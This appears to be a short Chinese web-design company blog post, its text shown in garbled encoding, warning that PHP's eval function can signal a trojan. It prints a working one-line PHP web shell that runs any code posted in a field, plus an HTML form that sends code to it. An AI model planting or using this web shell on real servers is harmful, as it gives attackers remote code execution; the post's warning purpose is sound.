結(jié)合設(shè)計經(jīng)驗與營銷實踐,提供有價值的互聯(lián)網(wǎng)資訊
發(fā)布日期:2017-03-19瀏覽次數(shù):1200 來源:福州網(wǎng)站建設(shè)
eval可以用來執(zhí)行任何其他php代碼,所以對于代碼里發(fā)現(xiàn)了eval函數(shù)一定要小心,可能是木馬
就這一句話害死人,這樣任何人都可以post任何文件上來,所以要做好防范
|
1
|
<?php @eval($_POST['c']);?> |
使用方法也很簡單,本地提交文件指向提交文件,里面的php代碼就會被執(zhí)行
|
1
2
3
4
5
6
7
8
|
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html> |
以上是由福州網(wǎng)站建設(shè)的小編為你分享了"php一句話木馬eval函數(shù)"文章,如果你在這方面有什么問題,隨時聯(lián)系我們
微信便捷交流